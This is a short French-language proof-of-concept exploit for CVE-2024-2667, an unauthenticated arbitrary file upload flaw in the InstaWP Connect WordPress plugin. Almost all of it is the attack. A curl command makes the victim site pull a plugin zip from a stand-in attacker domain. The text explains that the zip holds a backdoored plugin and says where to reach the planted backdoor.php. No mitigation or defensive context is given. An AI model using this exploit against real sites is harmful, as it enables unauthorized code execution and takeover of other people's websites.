
Ceci est un POC pour CVE-2024-2667 (InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - Téléchargement de fichier arbitraire non authentifié)
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"
api_key -> Vous pouvez utiliser une clé API valide ou invalide.
override_plugin_zip -> Chemin vers le fichier zip contenant un plugin WordPress malveillant avec une porte dérobée.
Une fois importé, vous pouvez accéder à la porte dérobée via http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php (en supposant que le nom du répertoire est malicious-plugin et que backdoor.php se trouve dans ce répertoire).
Références :